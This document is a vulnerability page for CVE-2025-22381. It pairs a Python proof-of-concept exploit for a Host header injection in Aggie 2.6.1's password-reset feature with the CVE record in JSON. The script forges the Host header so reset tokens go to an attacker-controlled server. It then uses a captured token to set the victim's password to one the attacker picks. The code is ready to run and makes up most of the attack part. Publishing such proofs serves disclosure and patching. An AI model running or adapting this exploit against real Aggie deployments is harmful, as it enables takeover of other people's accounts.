CVE-2025-22381

# CVE-2025-22381 - Aggie 2.6.1 Host Header Injection PoC # Vulnerability: Host Header Injection in forgot password functionality # Impact: Attacker can reset any user's password by intercepting reset token import requests # Target configuration target_url = "https://target-aggie-instance.com" attacker_host = "attacker-controlled-server.com" target_email = "[email protected]" # Step 1: Send forgot password request with forged Host header headers = { "Host": attacker_host, # Forged Host header pointing to attacker's server "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Connection": "close" } # Payload for forgot password request payload = { "email": target_email } # Send the malicious request print(f"[*] Sending forged password reset request for: {target_email}") response = requests.post( f"{target_url}/forgot-password", headers=headers, data=payload, allow_redirects=False ) if response.status_code == 200 or response.status_code == 302: print("[+] Password reset request sent successfully") print(f"[*] The reset link will be generated using Host: {attacker_host}") print("[*] Victim will receive an email with a reset link pointing to attacker's server") print("[*] Attacker can capture the token and use it to reset victim's password") else: print(f"[-] Request failed with status code: {response.status_code}") # Step 2: Attacker captures the reset token on their controlled server # The reset link will look like: # https://attacker-controlled-server.com/reset-password?token=CAPTURED_TOKEN # Step 3: Attacker uses the captured token to reset victim's password captured_token = "TOKEN_FROM_ATTACKER_SERVER" # Replace with actual captured token reset_url = f"{target_url}/reset-password" reset_payload = { "token": captured_token, "password": "new_attacker_password_123", "password_confirmation": "new_attacker_password_123" } print(f"[*] Using captured token to reset password at: {reset_url}") reset_response = requests.post(reset_url, data=reset_payload) if reset_response.status_code == 200: print("[+] Password reset successful! Attacker now has access to victim's account") else: print(f"[-] Password reset failed with status code: {reset_response.status_code}")

{"cve": {"id": "CVE-2025-22381", "sourceIdentifier": "[email protected]", "published": "2025-10-16T15:15:32.910", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Aggie 2.6.1 has a Host Header injection vulnerability in the forgot password functionality, allowing an attacker to reset a user's password."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-620"}]}], "references": [{"url": "https://github.com/TID-Lab/aggie/tree/a9d5becaff3ea90720ea7213c80825e253b8a730", "source": "[email protected]"}, {"url": "https://github.com/bugdotexe/Vulnerability-Research/tree/main/CVE-2025-22381", "source": "[email protected]"}, {"url": "https://github.com/pescada-dev/CVE-2025-22381", "source": "[email protected]"}]}}